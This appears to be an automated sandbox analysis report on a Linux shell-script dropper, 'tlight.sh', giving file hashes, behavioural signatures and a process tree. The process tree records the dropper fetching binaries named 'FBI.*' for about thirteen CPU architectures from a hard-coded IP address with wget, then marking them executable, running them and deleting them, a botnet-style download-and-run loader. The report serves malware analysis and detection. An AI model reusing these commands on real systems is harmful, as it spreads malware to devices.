Resubmissions
22-08-2022 17:16
220822-vs7zgsaggj 9
22-08-2022 17:12
220822-vqym2adfh5 9
22-08-2022 05:59
220822-gpy1hsbgdp 9
22-08-2022 02:57
220822-df17qscff9 9
22-08-2022 02:42
220822-c68ttscee5 9
Analysis
-
max time kernel
22153s -
max time network
157s -
platform
linux_armhf -
resource
debian9-armhf-en-20211208 -
resource tags
arch:armhf image:debian9-armhf-en-20211208 kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
22-08-2022 02:42
Static task
static1
Behavioral task
behavioral1
Sample
tlight.sh
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
tlight.sh
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral3
Sample
tlight.sh
Resource
debian9-mipsbe-en-20211208
Behavioral task
behavioral4
Sample
tlight.sh
Resource
debian9-mipsel-en-20211208
General
-
Target
tlight.sh
-
Size
1KB
-
MD5
894e976a4a3f5e6038168b5c4b78f98d
-
SHA1
13cd9bc7146037714e546063867353cbb1b6ff03
-
SHA256
54f9d96c9369f699bff8c8ceae4d6f1376616488696be2d361f8c83034eab238
-
SHA512
4b3ddf27afd2f04d19d879aedf5e083af6d2511d426b6a9ce991ffcebaa4013890b6ab473c68c36c25717ced8c7ef4e89765fdd8407adc3b00be44256a0f7571
Malware Config
Signatures
-
Writes file to system bin folder 1 TTPs 1 IoCs
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
Processes:
cp description ioc process /proc/filesystems /proc/filesystems cp -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes:
cp tlight.sh description ioc process /tmp/busybox /tmp/busybox cp /tmp/tlight.sh /tmp/tlight.sh tlight.sh
Processes
-
/tmp/tlight.sh /tmp/tlight.sh wget "http://37.44.238.187/tlight.sh;chmod" 777 tlight.sh 1⤵
- Writes file to tmp directory
PID:363 -
/bin/cp cp /bin/busybox /tmp/ 2⤵
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:364 -
/usr/bin/wget wget http://37.44.238.187/FBI.i486 2⤵ PID:366
-
/bin/chmod chmod 777 FBI.i486 2⤵ PID:370
-
./FBI.i486 ./FBI.i486 tlight.i486.wget 2⤵ PID:371
-
/bin/rm rm -rf FBI.i486 2⤵ PID:372
-
/usr/bin/wget wget http://37.44.238.187/FBI.x86_64 2⤵ PID:374
-
/bin/chmod chmod 777 FBI.x86_64 2⤵ PID:377
-
./FBI.x86_64 ./FBI.x86_64 tlight.x86_64.wget 2⤵ PID:378
-
/bin/rm rm -rf FBI.x86_64 2⤵ PID:380
-
/usr/bin/wget wget http://37.44.238.187/FBI.i586 2⤵ PID:381
-
/bin/chmod chmod 777 FBI.i586 2⤵ PID:383
-
./FBI.i586 ./FBI.i586 tlight.i586.wget 2⤵ PID:384
-
/bin/rm rm -rf FBI.i586 2⤵ PID:385
-
/usr/bin/wget wget http://37.44.238.187/FBI.i686 2⤵ PID:386
-
/bin/chmod chmod 777 FBI.i686 2⤵ PID:388
-
./FBI.i686 ./FBI.i686 tlight.i686.wget 2⤵ PID:389
-
/bin/rm rm -rf FBI.i686 2⤵ PID:391
-
/usr/bin/wget wget http://37.44.238.187/FBI.mips 2⤵ PID:392
-
/bin/chmod chmod 777 FBI.mips 2⤵ PID:394
-
./FBI.mips ./FBI.mips tlight.mips.wget 2⤵ PID:395
-
/bin/rm rm -rf FBI.mips 2⤵ PID:397
-
/usr/bin/wget wget http://37.44.238.187/FBI.mipsel 2⤵ PID:398
-
/bin/chmod chmod 777 FBI.mipsel 2⤵ PID:400
-
./FBI.mipsel ./FBI.mipsel tlight.mipsel.wget 2⤵ PID:401
-
/bin/rm rm -rf FBI.mipsel 2⤵ PID:402
-
/usr/bin/wget wget http://37.44.238.187/FBI.arm 2⤵ PID:403
-
/bin/chmod chmod 777 FBI.arm 2⤵ PID:405
-
./FBI.arm ./FBI.arm tlight.arm.wget 2⤵ PID:406
-
/bin/rm rm -rf FBI.arm 2⤵ PID:470
-
/usr/bin/wget wget http://37.44.238.187/FBI.arm5 2⤵ PID:471
-
/bin/chmod chmod 777 FBI.arm5 2⤵ PID:473
-
./FBI.arm5 ./FBI.arm5 tlight.arm5.wget 2⤵ PID:474
-
/bin/rm rm -rf FBI.arm5 2⤵ PID:532
-
/usr/bin/wget wget http://37.44.238.187/FBI.arm6 2⤵ PID:539
-
/bin/chmod chmod 777 FBI.arm6 2⤵ PID:541
-
./FBI.arm6 ./FBI.arm6 tlight.arm6.wget 2⤵ PID:542
-
/bin/rm rm -rf FBI.arm6 2⤵ PID:548
-
/usr/bin/wget wget http://37.44.238.187/FBI.arm7 2⤵ PID:549
-
/bin/chmod chmod 777 FBI.arm7 2⤵ PID:551
-
./FBI.arm7 ./FBI.arm7 tlight.arm7.wget 2⤵ PID:552
-
/bin/rm rm -rf FBI.arm7 2⤵ PID:558
-
/usr/bin/wget wget http://37.44.238.187/FBI.ppc 2⤵ PID:559
-
/bin/chmod chmod 777 FBI.ppc 2⤵ PID:563
-
./FBI.ppc ./FBI.ppc tlight.ppc.wget 2⤵ PID:564
-
/bin/rm rm -rf FBI.ppc 2⤵ PID:569
-
/usr/bin/wget wget http://37.44.238.187/FBI.m68k 2⤵ PID:570
-
/bin/chmod chmod 777 FBI.m68k 2⤵ PID:574
-
./FBI.m68k ./FBI.m68k tlight.m68k.wget 2⤵ PID:575
-
/bin/rm rm -rf FBI.m68k 2⤵ PID:576
-
/usr/bin/wget wget http://37.44.238.187/FBI.sh4 2⤵ PID:577
-
/bin/chmod chmod 777 FBI.sh4 2⤵ PID:579
-
./FBI.sh4 ./FBI.sh4 tlight.sh4.wget 2⤵ PID:580
-
/bin/rm rm -rf FBI.sh4 2⤵ PID:582